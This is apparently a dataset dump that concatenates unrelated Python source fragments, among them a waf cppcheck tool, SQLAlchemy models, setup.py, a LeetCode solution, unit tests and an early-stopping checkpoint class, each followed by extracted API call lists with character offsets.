            os.path.join(os.environ["PUBLIC"], "Documents", "MISRA-C"),
        ]
    else:
        doc_paths = [os.path.join(os.path.expanduser("~"), "MISRA-C")]
    candidates = [
        opt.root.find_node(os.path.join(path, "rules-2012.txt")) for path in doc_paths
    ]
    # Default to the first rules file that actually exists, else False.
    default_rules = False
    for node in candidates:
        if node:
            default_rules = node.abspath()
            break
    opt.add_option(
        "--misra-rules-file",
        action="store",
        default=default_rules,
        dest="misra_rules_file",
        help="Sets the path to the MISRA rules file for cppcheck",
    )
def configure(conf):
    """configuration step of the Cppcheck waf tool

    - Find cppcheck
    - Search for the MISRA-C rules text
    """
    # Look for cppcheck on PATH first; on Windows fall back to the default
    # installation directory when that fails.
    conf.start_msg("Checking for program 'cppcheck'")
    conf.find_program("cppcheck", mandatory=False)
    if not conf.env.CPPCHECK and Utils.is_win32:
        default_dir = os.path.join(os.environ["ProgramFiles"], "Cppcheck")
        conf.find_program("cppcheck", path_list=[default_dir], mandatory=False)
    conf.end_msg(conf.env.get_flat("CPPCHECK"))
    if not conf.env.CPPCHECK:
        return
    conf.start_msg("Checking for MISRA-C rules file")
    option = conf.options.misra_rules_file
    if option:
        rules_node = conf.root.find_node(os.path.abspath(option))
        if rules_node:
            conf.env.append_unique("RULES_FILE", rules_node.abspath())
        else:
            Logs.warn(
                f"{os.path.abspath(option)} does not exist. Ignoring input."
            )
    conf.end_msg(conf.env.get_flat("RULES_FILE"))
| [
"os.path.abspath",
"os.path.join",
"os.path.expanduser",
"waflib.TaskGen.feature"
] | [((3005, 3032), 'waflib.TaskGen.feature', 'TaskGen.feature', (['"""cppcheck"""'], {}), "('cppcheck')\n", (3020, 3032), False, 'from waflib import Utils, Task, TaskGen, Logs\n'), ((3345, 3403), 'os.path.join', 'os.path.join', (["os.environ['PUBLIC']", '"""Documents"""', '"""MISRA-C"""'], {}), "(os.environ['PUBLIC'], 'Documents', 'MISRA-C')\n", (3357, 3403), False, 'import os\n'), ((3566, 3599), 'os.path.join', 'os.path.join', (['x', '"""rules-2012.txt"""'], {}), "(x, 'rules-2012.txt')\n", (3578, 3599), False, 'import os\n'), ((4807, 4853), 'os.path.abspath', 'os.path.abspath', (['conf.options.misra_rules_file'], {}), '(conf.options.misra_rules_file)\n', (4822, 4853), False, 'import os\n'), ((3283, 3306), 'os.path.expanduser', 'os.path.expanduser', (['"""~"""'], {}), "('~')\n", (3301, 3306), False, 'import os\n'), ((3472, 3495), 'os.path.expanduser', 'os.path.expanduser', (['"""~"""'], {}), "('~')\n", (3490, 3495), False, 'import os\n'), ((4456, 4508), 'os.path.join', 'os.path.join', (["os.environ['ProgramFiles']", '"""Cppcheck"""'], {}), "(os.environ['ProgramFiles'], 'Cppcheck')\n", (4468, 4508), False, 'import os\n'), ((4924, 4970), 'os.path.abspath', 'os.path.abspath', (['conf.options.misra_rules_file'], {}), '(conf.options.misra_rules_file)\n', (4939, 4970), False, 'import os\n')] |
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy import Column, Integer, String, DateTime, Sequence
Base = declarative_base()
class Subscription(Base):
    """ORM model for a notification subscription."""
    __tablename__ = 'subscriptions'
    id = Column(Integer, Sequence('subscription_id_seq'), primary_key=True)
    # Indexed external identifier -- presumably a subreddit id; confirm with callers.
    sr_id = Column(String, index=True)
    # Delivery method and contact address for the notification.
    method = Column(String)
    contact = Column(String)
class UpdateInfoItem(Base):
    """Simple key/value row used to store update metadata."""
    __tablename__ = 'updateinfo'
    key = Column(String, primary_key=True)
    value = Column(String)
| [
"sqlalchemy.Sequence",
"sqlalchemy.Column",
"sqlalchemy.ext.declarative.declarative_base"
] | [((131, 149), 'sqlalchemy.ext.declarative.declarative_base', 'declarative_base', ([], {}), '()\n', (147, 149), False, 'from sqlalchemy.ext.declarative import declarative_base\n'), ((313, 339), 'sqlalchemy.Column', 'Column', (['String'], {'index': '(True)'}), '(String, index=True)\n', (319, 339), False, 'from sqlalchemy import Column, Integer, String, DateTime, Sequence\n'), ((354, 368), 'sqlalchemy.Column', 'Column', (['String'], {}), '(String)\n', (360, 368), False, 'from sqlalchemy import Column, Integer, String, DateTime, Sequence\n'), ((383, 397), 'sqlalchemy.Column', 'Column', (['String'], {}), '(String)\n', (389, 397), False, 'from sqlalchemy import Column, Integer, String, DateTime, Sequence\n'), ((478, 510), 'sqlalchemy.Column', 'Column', (['String'], {'primary_key': '(True)'}), '(String, primary_key=True)\n', (484, 510), False, 'from sqlalchemy import Column, Integer, String, DateTime, Sequence\n'), ((523, 537), 'sqlalchemy.Column', 'Column', (['String'], {}), '(String)\n', (529, 537), False, 'from sqlalchemy import Column, Integer, String, DateTime, Sequence\n'), ((248, 279), 'sqlalchemy.Sequence', 'Sequence', (['"""subscription_id_seq"""'], {}), "('subscription_id_seq')\n", (256, 279), False, 'from sqlalchemy import Column, Integer, String, DateTime, Sequence\n')] |
#!/usr/bin/env python
# Motherstarter setup file
from setuptools import setup, find_packages
from motherstarter import __version__, __author__
# Open and read README file
with open("README.md", "r", encoding="utf-8") as f:
    README = f.read()
# Setup requirements to be installed
requirements = []
with open("requirements.txt") as f:
    requirements = f.read().splitlines()
# Package metadata; version/author come from the package itself so they
# are defined in exactly one place.
setup(
    author_email="<EMAIL>",
    description="Network automation inventory data translation tool.",
    long_description=README,
    long_description_content_type="text/markdown",
    url="https://github.com/writememe/motherstarter",
    name="motherstarter",
    license="Apache License 2.0",
    version=__version__,
    author=__author__,
    packages=find_packages(),
    classifiers=[
        "License :: OSI Approved :: Apache Software License",
        "Programming Language :: Python :: 3",
        "Programming Language :: Python :: 3.7",
        "Programming Language :: Python :: 3.8",
        "Programming Language :: Python :: 3.9",
        "Operating System :: POSIX :: Linux",
        "Operating System :: MacOS",
    ],
    python_requires=">=3.7",
    include_package_data=True,
    install_requires=requirements,
    # Installs the ``motherstarter`` console command pointing at the CLI.
    entry_points="""
    [console_scripts]
    motherstarter=motherstarter.motherstarter:cli
    """,
)
| [
"setuptools.find_packages"
] | [((744, 759), 'setuptools.find_packages', 'find_packages', ([], {}), '()\n', (757, 759), False, 'from setuptools import setup, find_packages\n')] |
import graphene
from typing import cast
from graphene_django import DjangoObjectType
from graphene_django.debug import DjangoDebug
from django.contrib.auth import get_user_model
import devind_dictionaries.schema
class UserType(DjangoObjectType):
    """GraphQL type exposing a restricted subset of the Django user model."""
    class Meta:
        model = get_user_model()
        # Explicit whitelist: password and other sensitive columns stay hidden.
        fields = ('id', 'username', 'last_name', 'email', 'is_active',)
class Query(
    devind_dictionaries.schema.Query,
    graphene.ObjectType
):
    """Root GraphQL query: dictionary queries plus a debug introspection field."""
    debug = graphene.Field(DjangoDebug, name='__debug')
class Mutation(
    devind_dictionaries.schema.Mutation,
    graphene.ObjectType
):
    """Root GraphQL mutation: currently only the dictionary mutations."""
    pass
schema = graphene.Schema(query=cast(graphene.ObjectType, Query), mutation=Mutation)
| [
"django.contrib.auth.get_user_model",
"graphene.Field",
"typing.cast"
] | [((465, 508), 'graphene.Field', 'graphene.Field', (['DjangoDebug'], {'name': '"""__debug"""'}), "(DjangoDebug, name='__debug')\n", (479, 508), False, 'import graphene\n'), ((284, 300), 'django.contrib.auth.get_user_model', 'get_user_model', ([], {}), '()\n', (298, 300), False, 'from django.contrib.auth import get_user_model\n'), ((637, 669), 'typing.cast', 'cast', (['graphene.ObjectType', 'Query'], {}), '(graphene.ObjectType, Query)\n', (641, 669), False, 'from typing import cast\n')] |
import numpy as np
def main():
from fuzzi.evaluation import pate_train
from fuzzi.generated import pate_label
predictions = pate_label.outputs
truth = [x[-1] for x in pate_label.db_test]
print(predictions)
print(truth)
print('PATE accuracy = %f' % (np.mean(predictions == truth)))
| [
"numpy.mean"
] | [((279, 308), 'numpy.mean', 'np.mean', (['(predictions == truth)'], {}), '(predictions == truth)\n', (286, 308), True, 'import numpy as np\n')] |
from __future__ import absolute_import, unicode_literals
import os
import subprocess
import pytest
from virtualenv.discovery.py_info import PythonInfo
from virtualenv.run import run_via_cli
from virtualenv.util.path import Path
from virtualenv.util.subprocess import Popen
# Interrogate the interpreter running this test session once, up front,
# and cache the creator classes it supports.
CURRENT = PythonInfo.current_system()
CREATOR_CLASSES = CURRENT.creators().key_to_class
def builtin_shows_marker_missing():
    """Return True when the builtin creator reports its host include marker absent."""
    creator = CREATOR_CLASSES.get("builtin")
    if creator is None:
        return False
    marker_factory = getattr(creator, "host_include_marker", None)
    return marker_factory is not None and not marker_factory(CURRENT).exists()
@pytest.mark.xfail(
    condition=bool(os.environ.get(str("CI_RUN"))),
    strict=False,
    reason="did not manage to setup CI to run with VC 14.1 C++ compiler, but passes locally",
)
@pytest.mark.skipif(
    not Path(CURRENT.system_include).exists() and not builtin_shows_marker_missing(),
    reason="Building C-Extensions requires header files with host python",
)
@pytest.mark.parametrize("creator", list(i for i in CREATOR_CLASSES.keys() if i != "builtin"))
def test_can_build_c_extensions(creator, tmp_path, coverage_env):
    """End-to-end: a venv made by each creator can compile and run a C extension."""
    # Create a venv with the given creator, seeding pip & co. from app-data.
    session = run_via_cli(["--creator", creator, "--seed", "app-data", str(tmp_path), "-vvv"])
    coverage_env()
    # Install the bundled ``greet`` C-extension into the venv, fully offline.
    cmd = [
        str(session.creator.script("pip")),
        "install",
        "--no-index",
        "--no-deps",
        "--disable-pip-version-check",
        "-vvv",
        str(Path(__file__).parent.resolve() / "greet"),
    ]
    process = Popen(cmd)
    process.communicate()
    assert process.returncode == 0
    # Import and exercise the freshly built extension inside the venv.
    process = Popen(
        [str(session.creator.exe), "-c", "import greet; greet.greet('World')"],
        universal_newlines=True,
        stdout=subprocess.PIPE,
    )
    out, _ = process.communicate()
    assert process.returncode == 0
    assert out == "Hello World!\n"
| [
"virtualenv.util.path.Path",
"virtualenv.discovery.py_info.PythonInfo.current_system",
"virtualenv.util.subprocess.Popen"
] | [((287, 314), 'virtualenv.discovery.py_info.PythonInfo.current_system', 'PythonInfo.current_system', ([], {}), '()\n', (312, 314), False, 'from virtualenv.discovery.py_info import PythonInfo\n'), ((1611, 1621), 'virtualenv.util.subprocess.Popen', 'Popen', (['cmd'], {}), '(cmd)\n', (1616, 1621), False, 'from virtualenv.util.subprocess import Popen\n'), ((932, 960), 'virtualenv.util.path.Path', 'Path', (['CURRENT.system_include'], {}), '(CURRENT.system_include)\n', (936, 960), False, 'from virtualenv.util.path import Path\n'), ((1547, 1561), 'virtualenv.util.path.Path', 'Path', (['__file__'], {}), '(__file__)\n', (1551, 1561), False, 'from virtualenv.util.path import Path\n')] |
#!/usr/bin/env python
# -*- coding:utf-8 -*-
"""=================================================================
@Project : Algorithm_YuweiYin/LeetCode-All-Solution/Python3
@File : LC-0388-Longest-Absolute-File-Path.py
@Author : [YuweiYin](https://github.com/YuweiYin)
@Date : 2022-04-20
=================================================================="""
import sys
import time
from typing import List
# import functools
"""
LeetCode - 0388 - (Medium) - Longest Absolute File Path
https://leetcode.com/problems/longest-absolute-file-path/
Description & Requirement:
Suppose we have a file system that stores both files and directories.
An example of one system in text form looks like this (with ⟶ representing the tab character):
dir
⟶ subdir1
⟶ ⟶ file1.ext
⟶ ⟶ subsubdir1
⟶ subdir2
⟶ ⟶ subsubdir2
⟶ ⟶ ⟶ file2.ext
Here, we have dir as the only directory in the root. dir contains two subdirectories,
subdir1 and subdir2. subdir1 contains a file file1.ext and subdirectory subsubdir1.
subdir2 contains a subdirectory subsubdir2, which contains a file file2.ext.
If we were to write this representation in code, it will look like this:
"dir\n\tsubdir1\n\t\tfile1.ext\n\t\tsubsubdir1\n\tsubdir2\n\t\tsubsubdir2\n\t\t\tfile2.ext".
Note that the '\n' and '\t' are the new-line and tab characters.
Every file and directory has a unique absolute path in the file system,
which is the order of directories that must be opened to reach the file/directory itself,
all concatenated by '/'s. Using the above example, the absolute path to file2.ext is
"dir/subdir2/subsubdir2/file2.ext". Each directory name consists of letters, digits,
and/or spaces. Each file name is of the form name.extension,
where name and extension consist of letters, digits, and/or spaces.
Given a string input representing the file system in the explained format,
return the length of the longest absolute path to a file in the abstracted file system.
If there is no file in the system, return 0.
Example 1:
Input: input = "dir\n\tsubdir1\n\tsubdir2\n\t\tfile.ext"
Output: 20
Explanation: We have only one file, and the absolute path is "dir/subdir2/file.ext" of length 20.
Example 2:
Input: input = "dir\n\tsubdir1\n\t\tfile1.ext\n\t\tsubsubdir1\n\tsubdir2\n\t\tsubsubdir2\n\t\t\tfile2.ext"
Output: 32
Explanation: We have two files:
"dir/subdir1/file1.ext" of length 21
"dir/subdir2/subsubdir2/file2.ext" of length 32.
We return 32 since it is the longest absolute path to a file.
Example 3:
Input: input = "a"
Output: 0
Explanation: We do not have any files, just a single directory named "a".
Constraints:
1 <= input.length <= 10^4
input may contain lowercase or uppercase English letters, a new line character '\n',
a tab character '\t', a dot '.', a space ' ', and digits.
"""
class Solution:
    def lengthLongestPath(self, _input: str) -> int:
        """Return the length of the longest absolute path to a file, or 0 if there is no file."""
        # guard against invalid input (problem guarantees a non-empty string)
        assert isinstance(_input, str) and len(_input) >= 1
        return self._lengthLongestPath(_input)

    def _lengthLongestPath(self, _input: str) -> int:
        """Scan the serialized tree line by line, tracking path length per depth."""
        longest = 0
        # prefix_len[d] == length of the absolute path of the directory currently open at depth d
        prefix_len = []
        for entry in _input.split("\n"):
            name = entry.lstrip("\t")
            depth = len(entry) - len(name)  # number of leading tabs == nesting depth
            # discard levels at or below this depth; they belong to an earlier subtree
            del prefix_len[depth:]
            # "+1" accounts for the '/' separator when there is a parent directory
            parent_len = prefix_len[-1] + 1 if prefix_len else 0
            if "." in name:
                # per the problem statement only file names contain a dot
                longest = max(longest, parent_len + len(name))
            else:
                prefix_len.append(parent_len + len(name))
        return longest
def main():
    """Run the Example 2 input through Solution, print the answer and the CPU time used."""
    # Example 1: Output: 20
    # _input = "dir\n\tsubdir1\n\tsubdir2\n\t\tfile.ext"
    # Example 2: Output: 32
    _input = "dir\n\tsubdir1\n\t\tfile1.ext\n\t\tsubsubdir1\n\tsubdir2\n\t\tsubsubdir2\n\t\t\tfile2.ext"
    # Example 3: Output: 0
    # _input = "a"
    solver = Solution()
    # time the call with process (CPU) time rather than wall-clock time
    start = time.process_time()
    ans = solver.lengthLongestPath(_input)
    elapsed = time.process_time() - start
    print('\nAnswer:')
    print(ans)
    print('Running Time: %.5f ms' % (elapsed * 1000))


if __name__ == "__main__":
    sys.exit(main())
| [
"time.process_time"
] | [((4946, 4965), 'time.process_time', 'time.process_time', ([], {}), '()\n', (4963, 4965), False, 'import time\n'), ((5021, 5040), 'time.process_time', 'time.process_time', ([], {}), '()\n', (5038, 5040), False, 'import time\n')] |
import os
import sys
import warnings
# Emit a deprecation warning as soon as this package is imported;
# stacklevel=2 attributes the warning to the importing module.
warnings.warn(
    "pathod and pathoc modules are deprecated, see https://github.com/mitmproxy/mitmproxy/issues/4273",
    DeprecationWarning,
    stacklevel=2
)
def print_tool_deprecation_message():
    """Write a banner to stderr announcing that this command-line tool is deprecated."""
    tool_name = os.path.basename(sys.argv[0])
    banner = [
        "####",
        f"### {tool_name} is deprecated and will not be part of future mitmproxy releases!",
        "### See https://github.com/mitmproxy/mitmproxy/issues/4273 for more information.",
        "####",
        "",
    ]
    for line in banner:
        print(line, file=sys.stderr)
| [
"warnings.warn",
"os.path.basename"
] | [((39, 196), 'warnings.warn', 'warnings.warn', (['"""pathod and pathoc modules are deprecated, see https://github.com/mitmproxy/mitmproxy/issues/4273"""', 'DeprecationWarning'], {'stacklevel': '(2)'}), "(\n 'pathod and pathoc modules are deprecated, see https://github.com/mitmproxy/mitmproxy/issues/4273'\n , DeprecationWarning, stacklevel=2)\n", (52, 196), False, 'import warnings\n'), ((293, 322), 'os.path.basename', 'os.path.basename', (['sys.argv[0]'], {}), '(sys.argv[0])\n', (309, 322), False, 'import os\n')] |
import unittest
from model.curseur import Curseur
from model.pion import PionBlanc, PionNoir
from model.qubic import Qubic
class TestQubic(unittest.TestCase):
    """Unit tests for the Qubic (3D tic-tac-toe) game model."""
    def test_poser(self):
        """With gravity on, pieces fall to the lowest free cell and colors alternate."""
        q = Qubic()
        # y=7 is above the board, but gravity drops the piece to the column floor (y=0)
        q.poser((0, 7, 0))
        self.assertTrue(q.get_pion((0, 0, 0)) == PionBlanc)
        self.assertFalse(q.get_pion((0, 1, 0)))
        # second placement (Black's turn) stacks on top of the first piece
        q.poser((0, 7, 0))
        self.assertTrue(q.get_pion((0, 0, 0)) == PionBlanc)
        self.assertTrue(q.get_pion((0, 1, 0)) == PionNoir)
        self.assertTrue(q.get_pion((0, 2, 0)) is None)
    def test_tour(self):
        """Turns strictly alternate White/Black until the game is finished."""
        q = Qubic()
        i = 0  # number of moves played so far; even => White to move
        for x in range(len(q)):
            for y in range(len(q)):
                for z in range(len(q)):
                    if q.fini:
                        # once the game is over, neither side has the turn
                        self.assertFalse(q.tour_blanc() or q.tour_noir())
                    elif i % 2 == 0:
                        self.assertTrue(q.tour_blanc() and not q.tour_noir(), "au tour {}".format(i))
                    else:
                        self.assertTrue(q.tour_noir() and not q.tour_blanc(), "au tour {}".format(i))
                    q.poser((x, y, z))
                    i += 1
        self.assertFalse(q.tour_blanc() or q.tour_noir())
    def test_annule_pose(self):
        """Undoing the winning move removes the piece and clears the finished flag."""
        q = Qubic(gravite=False)
        self.make_win(q)
        q.annule_coup()
        self.assertTrue(q.get_pion((len(q) - 1, 0, 0)) is None)
        self.assertFalse(q.fini)
    def make_win(self, q):
        """Helper: play moves until White wins via the (x, 0, z) anti-diagonal at y=0."""
        # White plays along the anti-diagonal at y=0; Black answers at y=1
        for x, z in zip(range(len(q)), range(len(q))[:0:-1]):
            q.poser((x, 0, z))
            q.poser((x, 1, z))
            self.assertFalse(q.fini)
        # final White move completes the line and ends the game
        q.poser((len(q) - 1, 0, 0))
        self.assertTrue(q.fini)
    def test_valid_pos(self):
        """valid_pos accepts every in-board coordinate and rejects out-of-range ones."""
        q = Qubic()
        # NOTE(review): `c` is never used below — presumably meant to exercise
        # Curseur construction; confirm or remove.
        c = Curseur((4, 4, 4))
        for x in range(len(q)):
            for y in range(len(q)):
                for z in range(len(q)):
                    self.assertTrue(q.valid_pos((x, y, z)))
        self.assertFalse(q.valid_pos((-5, 1, 1)))
        self.assertFalse(q.valid_pos((1, 4, 1)))
    def test_reset(self):
        # TODO(review): reset() is exercised indirectly in test_victoire, but this
        # placeholder test has no assertions of its own.
        pass
    def test_victoire(self):
        """Win detection along several space diagonals (pieces written directly to the board)."""
        q = Qubic(gravite=False)
        for x in range(len(q)):
            q.poser((x, x, x))
            self.assertFalse(q.fini, "at pos {}".format(x))
        q.reset()
        self.make_win(q)
        q.reset()
        # main space diagonal (x, x, x)
        for x in range(len(q)):
            q.plateau[x][x][x] = PionBlanc()
        self.assertTrue(q.win((len(q) - 1,) * 3))
        q.reset()
        # diagonal (x, n-1-x, x)
        for x in range(len(q)):
            q.plateau[x][len(q) - 1 - x][x] = PionBlanc()
        self.assertTrue(q.win((len(q) - 1, 0, len(q) - 1)))
        q.reset()
        for x in list(range(len(q))):
            q.plateau[x][x][len(q) - 1 - x] = PionBlanc()
        # NOTE(review): this asserts a non-empty tuple, which is always truthy —
        # it likely should be self.assertTrue(q.win(...)); confirm intended coordinates.
        self.assertTrue((len(q), len(q), 0))
        q.reset()
        for x in list(range(len(q))):
            q.plateau[x][len(q) - 1 - x][len(q) - 1 - x] = PionBlanc()
        # NOTE(review): same tautology as above — probably meant to call q.win(...).
        self.assertTrue((len(q), len(q), 0))
if __name__ == '__main__':
    unittest.main()
| [
"unittest.main",
"model.pion.PionBlanc",
"model.qubic.Qubic",
"model.curseur.Curseur"
] | [((2433, 2448), 'unittest.main', 'unittest.main', ([], {}), '()\n', (2446, 2448), False, 'import unittest\n'), ((191, 198), 'model.qubic.Qubic', 'Qubic', ([], {}), '()\n', (196, 198), False, 'from model.qubic import Qubic\n'), ((522, 529), 'model.qubic.Qubic', 'Qubic', ([], {}), '()\n', (527, 529), False, 'from model.qubic import Qubic\n'), ((1016, 1036), 'model.qubic.Qubic', 'Qubic', ([], {'gravite': '(False)'}), '(gravite=False)\n', (1021, 1036), False, 'from model.qubic import Qubic\n'), ((1401, 1408), 'model.qubic.Qubic', 'Qubic', ([], {}), '()\n', (1406, 1408), False, 'from model.qubic import Qubic\n'), ((1415, 1433), 'model.curseur.Curseur', 'Curseur', (['(4, 4, 4)'], {}), '((4, 4, 4))\n', (1422, 1433), False, 'from model.curseur import Curseur\n'), ((1711, 1731), 'model.qubic.Qubic', 'Qubic', ([], {'gravite': '(False)'}), '(gravite=False)\n', (1716, 1731), False, 'from model.qubic import Qubic\n'), ((1926, 1937), 'model.pion.PionBlanc', 'PionBlanc', ([], {}), '()\n', (1935, 1937), False, 'from model.pion import PionBlanc, PionNoir\n'), ((2058, 2069), 'model.pion.PionBlanc', 'PionBlanc', ([], {}), '()\n', (2067, 2069), False, 'from model.pion import PionBlanc, PionNoir\n'), ((2206, 2217), 'model.pion.PionBlanc', 'PionBlanc', ([], {}), '()\n', (2215, 2217), False, 'from model.pion import PionBlanc, PionNoir\n'), ((2352, 2363), 'model.pion.PionBlanc', 'PionBlanc', ([], {}), '()\n', (2361, 2363), False, 'from model.pion import PionBlanc, PionNoir\n')] |
from typing import Any, Dict, Type, TypeVar, Union
import attr
from ..models.sherpa_job_bean import SherpaJobBean
from ..types import UNSET, Unset
T = TypeVar("T", bound="ProjectStatus")


@attr.s(auto_attribs=True)
class ProjectStatus:
    """Serializable view of a project's name, status, and optional pending job."""

    project_name: str
    status: str
    pending_job: Union[Unset, SherpaJobBean] = UNSET

    def to_dict(self) -> Dict[str, Any]:
        """Serialize to a plain dict; "pendingJob" is included only when set."""
        serialized: Dict[str, Any] = {
            "projectName": self.project_name,
            "status": self.status,
        }
        if not isinstance(self.pending_job, Unset):
            serialized["pendingJob"] = self.pending_job.to_dict()
        return serialized

    @classmethod
    def from_dict(cls: Type[T], src_dict: Dict[str, Any]) -> T:
        """Build an instance from a dict shaped like the output of to_dict."""
        data = src_dict.copy()
        raw_pending_job = data.pop("pendingJob", UNSET)
        pending_job: Union[Unset, SherpaJobBean] = (
            UNSET
            if isinstance(raw_pending_job, Unset)
            else SherpaJobBean.from_dict(raw_pending_job)
        )
        return cls(
            project_name=data.pop("projectName"),
            status=data.pop("status"),
            pending_job=pending_job,
        )
| [
"attr.s",
"typing.TypeVar"
] | [((154, 189), 'typing.TypeVar', 'TypeVar', (['"""T"""'], {'bound': '"""ProjectStatus"""'}), "('T', bound='ProjectStatus')\n", (161, 189), False, 'from typing import Any, Dict, Type, TypeVar, Union\n'), ((193, 218), 'attr.s', 'attr.s', ([], {'auto_attribs': '(True)'}), '(auto_attribs=True)\n', (199, 218), False, 'import attr\n')] |
from os import path, makedirs, walk ,remove, scandir, unlink
from numpy import inf
from torch import save as t_save
from lib.utils import sort_human, BOLD, CLR
class EarlyStopping:
    def __init__(self, log_path, patience=7, model=None, verbose=False, exp_tag=""):
        """Early stops the training if validation loss doesn't improve after a given patience.
        Creates "<log_path>/save_model/<exp_tag>" and its "best/" subdirectory if missing.
        Args:
            log_path (str): root directory under which checkpoints are written.
            patience (int): How long to wait after last time validation loss improved.
                            Default: 7
            model: optional model whose encoder/decoder params and frame counts are
                   stored as checkpoint metadata (under the 'meta' key).
            verbose (bool): If True, prints a message for each validation loss improvement.
                            Default: False
            exp_tag (str): experiment tag used as the checkpoint subdirectory name.
        """
        self.patience = patience
        self.verbose = verbose
        self.counter = 0  # epochs since last improvement
        self.best_score = None  # negated best validation loss seen so far
        self.early_stop = False  # flag for the training loop to stop on
        self.val_loss_min = inf
        self.global_min_loss = inf  # best validation loss ever (gates "best/" saves)
        save_dir = f"{log_path}/save_model/{exp_tag}"
        self.save_path = save_dir
        if not path.isdir(save_dir):
            makedirs(save_dir)
        save_dir = f"{self.save_path}/best/"
        if not path.isdir(save_dir):
            makedirs(save_dir)
        if model is not None:
            self.meta_info = {'meta':(model.encoder_params,\
                                    model.decoder_params,\
                                    model.n_frames_input,\
                                    model.n_frames_output)}
        else:
            self.meta_info = {}
    def __str__(self):
        # one "key=value" line per attribute, for quick inspection/logging
        return '\n'.join(f"{k}={v}" for k, v in vars(self).items())
    def __call__(self, val_loss, model, epoch, step=0):
        """Record a validation result; save checkpoints and update the early-stop state.
        Args:
            val_loss (float): validation loss for this evaluation.
            model: checkpoint payload; must support .update() (dict-like state,
                   e.g. a state_dict) — the meta_info entries are merged into it.
            epoch (int): current epoch number (used in checkpoint filenames).
            step (int): intra-epoch step; non-zero bypasses early-stop bookkeeping
                        and just saves an intermediate checkpoint.
        """
        score = -val_loss  # higher score == lower loss
        model.update(self.meta_info)
        if step != 0:
            # mid-epoch call: save only, no patience accounting
            self.save_checkpoint(val_loss, model, epoch, step)
        else:
            if self.best_score is None:
                # first evaluation ever
                self.best_score = score
                self.save_checkpoint(val_loss, model, epoch, step)
            elif score < self.best_score:
                # no improvement: count towards patience
                self.counter += 1
                if self.counter >= self.patience:
                    self.early_stop = True
                    print(f"{BOLD}[*] early stopping at epoch {epoch} !{CLR}")
                else:
                    print(f"[*] early stopping counter: {BOLD}{self.counter}/{self.patience}{CLR}")
                    # self.del_old_models()
            else:
                # improvement: record it and reset the patience counter
                self.best_score = score
                self.save_checkpoint(val_loss, model, epoch, step)
                self.counter = 0
        # always keep a rolling "LAST" checkpoint regardless of improvement
        t_save(model, f"{self.save_path}/LAST_checkpoint_{epoch}_{step}_{val_loss:.6f}.pth.tar")
    def del_old_models(self, keep=10):
        """Prune checkpoint files once more than `keep` exist.
        Deletes the first keep//2 entries of the human-sorted file list
        (presumably the oldest checkpoints — depends on sort_human ordering; verify).
        """
        _, _, files = next(walk(self.save_path))
        file_count = len(files)
        if file_count > keep:
            for old_model in sort_human(files)[:keep//2]:
                remove(path.join(self.save_path, old_model))
    def save_checkpoint(self, val_loss, model, epoch, step=0):
        """Save a checkpoint file named after epoch, step and validation loss.
        Args:
            val_loss (float): validation loss encoded into the filename.
            model: checkpoint payload passed to torch.save.
            epoch (int): current epoch.
            step (int): non-zero marks an intra-epoch ("IE"-prefixed) save.
        """
        # save best model
        if step != 0:
            save_flag = "IE"
            print(f"[$] saveing model at step: {step} in epoch {epoch}")
            self.del_old_models()
            t_save(model, f"{self.save_path}/{save_flag}checkpoint_{epoch}_{step}_{val_loss}.pth.tar")
        else:
            if val_loss < self.global_min_loss:
                if self.verbose:
                    print(f"[*] validation loss record {BOLD}{val_loss}{CLR} in epoch: {BOLD}{epoch}{CLR}@{step}")
                self.global_min_loss = val_loss
                save_flag = "best/"
                # the "best/" directory holds exactly one file: clear it first
                for file in scandir(f"{self.save_path}/{save_flag}"):
                    unlink(file.path)
            else:
                save_flag = ""
            #self.del_old_models()
            t_save(model, f"{self.save_path}/{save_flag}checkpoint_{epoch}_{step}_{val_loss}.pth.tar")
        self.val_loss_min = val_loss
| [
"lib.utils.sort_human",
"os.makedirs",
"os.scandir",
"os.path.join",
"os.path.isdir",
"os.unlink",
"torch.save",
"os.walk"
] | [((975, 995), 'os.path.isdir', 'path.isdir', (['save_dir'], {}), '(save_dir)\n', (985, 995), False, 'from os import path, makedirs, walk, remove, scandir, unlink\n'), ((1009, 1027), 'os.makedirs', 'makedirs', (['save_dir'], {}), '(save_dir)\n', (1017, 1027), False, 'from os import path, makedirs, walk, remove, scandir, unlink\n'), ((1088, 1108), 'os.path.isdir', 'path.isdir', (['save_dir'], {}), '(save_dir)\n', (1098, 1108), False, 'from os import path, makedirs, walk, remove, scandir, unlink\n'), ((1122, 1140), 'os.makedirs', 'makedirs', (['save_dir'], {}), '(save_dir)\n', (1130, 1140), False, 'from os import path, makedirs, walk, remove, scandir, unlink\n'), ((2665, 2757), 'torch.save', 't_save', (['model', 'f"""{self.save_path}/LAST_checkpoint_{epoch}_{step}_{val_loss:.6f}.pth.tar"""'], {}), "(model,\n f'{self.save_path}/LAST_checkpoint_{epoch}_{step}_{val_loss:.6f}.pth.tar')\n", (2671, 2757), True, 'from torch import save as t_save\n'), ((2821, 2841), 'os.walk', 'walk', (['self.save_path'], {}), '(self.save_path)\n', (2825, 2841), False, 'from os import path, makedirs, walk, remove, scandir, unlink\n'), ((3480, 3579), 'torch.save', 't_save', (['model', 'f"""{self.save_path}/{save_flag}checkpoint_{epoch}_{step}_{val_loss}.pth.tar"""'], {}), "(model,\n f'{self.save_path}/{save_flag}checkpoint_{epoch}_{step}_{val_loss}.pth.tar'\n )\n", (3486, 3579), True, 'from torch import save as t_save\n'), ((4071, 4170), 'torch.save', 't_save', (['model', 'f"""{self.save_path}/{save_flag}checkpoint_{epoch}_{step}_{val_loss}.pth.tar"""'], {}), "(model,\n f'{self.save_path}/{save_flag}checkpoint_{epoch}_{step}_{val_loss}.pth.tar'\n )\n", (4077, 4170), True, 'from torch import save as t_save\n'), ((2934, 2951), 'lib.utils.sort_human', 'sort_human', (['files'], {}), '(files)\n', (2944, 2951), False, 'from lib.utils import sort_human, BOLD, CLR\n'), ((3893, 3933), 'os.scandir', 'scandir', (['f"""{self.save_path}/{save_flag}"""'], {}), "(f'{self.save_path}/{save_flag}')\n", 
(3900, 3933), False, 'from os import path, makedirs, walk, remove, scandir, unlink\n'), ((2986, 3022), 'os.path.join', 'path.join', (['self.save_path', 'old_model'], {}), '(self.save_path, old_model)\n', (2995, 3022), False, 'from os import path, makedirs, walk, remove, scandir, unlink\n'), ((3955, 3972), 'os.unlink', 'unlink', (['file.path'], {}), '(file.path)\n', (3961, 3972), False, 'from os import path, makedirs, walk, remove, scandir, unlink\n')] |
"""
This file tests the TC100 error:
>> Missing 'from __future__ import annotations' import
The idea is that we should raise one of these errors if a file contains any type-checking imports and one is missing.
